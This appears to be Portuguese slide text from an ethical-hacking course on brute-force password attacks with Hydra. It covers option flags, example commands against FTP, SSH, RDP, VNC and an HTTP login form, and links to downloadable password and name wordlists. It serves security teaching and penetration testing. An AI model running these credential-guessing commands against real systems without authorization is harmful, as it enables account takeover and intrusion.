O que temos pra hoje?
Temas de Hoje: Brute Force Conhecendo Hydra Modos de Uso Atacando Servios Padro Atacando HTTP Post Form Brinde! Wordlists grtis
Tcnicas de Invaso Brute Force
Brute force com Hydra
Tcnicas de Invaso Brute Force
Hydra: Entendendo a ferramenta
O Hydra descobre senha atravs de brute-force (tentativa e erro), ele busca
em wordlists, possveis usurios/senhas e vai testando as combinaes, uma a
uma.
O Hydra tem suporte aos servios Telnet, Formulrio HTTP/HTTPS, SSH, MySQL,
PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.
A ferramenta j vem toda instalada e configurada (inclusive com interface grfica)
no BackTrack, porm, caso no tenha instalado, basta fazer o download do cdigo-
fonte e compil-la em qualquer distribuio.
Tcnicas de Invaso Brute Force
Hydra: Entendendo a ferramenta
Opes da ferramenta:
-l = Nome/login da vtima;
-L = Carrega uma lista contendo nomes/logins de vtimas (1 por linha);
-p = Especifica senha nica;
-P = Carrega uma lista com senhas (1 por linha);
-e = Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass;
-C = Usado para carregar um arquivo contendo usurio:senha. Formato
usurio:senha equivale a - L/-P;
-M = Carrega lista de servidores alvos (1 por linha);
-o = Salva as senhas encontradas dentro do arquivo que voc especificar;
-f = Faz o programa parar de trabalhar quando a senha ou usurio for
encontrada[o];
-t = Limita o numero de solicitaes por vez (default: 16);
-w = Define o tempo mximo em segundos para esperar resposta do servidor
(default: 30s);
-v / -V = Modo verbose do programa. 'V' mostra todas tentativas.
Tcnicas de Invaso Brute Force
Hydra: Modo de Uso
Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando servios RDP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 rdp
Atacando servios VNC:
# hydra -L wordlist -P wordlist -v 192.168.2.100 vnc
Atacando websites com usurio e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
Tcnicas de Invaso Brute Force
Hydra: Modo de Uso
Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp -vV
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando websites com usurio e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
Tcnicas de Invaso Brute Force
Brinde: Wordlists
Seguem wordlists em Portugus e Ingls:
Dicionrio da Lingua Portuguesa retirada do BROffice:
# http://www.esecurity.com.br/blackhat2/wordlists/dicionario.txt
Dicinrio: Nomes masculinos e femininos (ENG):
# http://www.esecurity.com.br/blackhat2/wordlists/female-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/male-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/other-names.txt
Dicionrio com senhas comuns:
# http://www.esecurity.com.br/blackhat2/wordlists/senhas-comuns.txt
Dicionrio com palavras em Portugus + de 120.000 palavras:
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist-ptbr.txt
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist70k.txt
Dicionrio baseada nas contas mais comuns criadas no Linux:
# http://www.esecurity.com.br/blackhat2/wordlists/etc-hosts.txt
Tcnicas de Invaso Brute Force
E-mail: [email protected]
Twitter: @esecuritybr e @desafiohacker
Skype: desafiohacker
Fanpage: www.facebook.com/academiahacker
printf ("\Chega por hoje\n");
www.eSecurity.com.br
Tcnicas de Invaso Ataques redes Wifi
Top Related